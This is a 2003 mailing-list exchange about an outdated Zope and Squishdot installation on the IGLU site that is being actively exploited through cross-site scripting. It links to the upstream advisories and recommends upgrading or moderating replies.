On Tue, Jul 01, 2003 at 02:53:19PM +0300, Aviram Jenik wrote:
> On Tuesday 01 July 2003 10:08, Tzafrir Cohen wrote:
> >
> > The version of Zope on IGLU is quite old. 2.1-something, IIRC. The
> > version of Squishdot is probably almost as old.
> >
> > Upgrade? Replace with something else (that people here know how to
> > maintain)? This question has arose several times in the past.
>
> I would of course recommend upgrading, but there might be other considerations
> involved from your side, so it's obviously up to you guys to decide.
> However, whatever you decide about Zope, make sure you filter <script> tags,
> in whatever workaround you can find for it - as it is now, anyone can steal
> the administrative cookie, or post fake news as someone else, or a bunch of
> other Cross-Site-Scripting attacks. This is no longer a theoretical
> vulnerability: there are people who know IGLU is vulnerable (2600) and they
> are already actively exploiting it!
Some relevant links:
A similar problem acknoleged on Feb 2000:
http://squishdot.org/949677969/index_html
The workaround from there: moderate replies.
Problem should have been fixed in Squishdot 1.0, Mar 2001:
http://squishdot.org/985283025/index_html
BTW: take a look at the changelog: http://squishdot.org/Documentation/Changes
specifically, version 0.6 :-)
--
Tzafrir Cohen +---------------------------+
http://www.technion.ac.il/~tzafrir/ |vim is a mutt's best friend|
mailto:[EMAIL PROTECTED] +---------------------------+
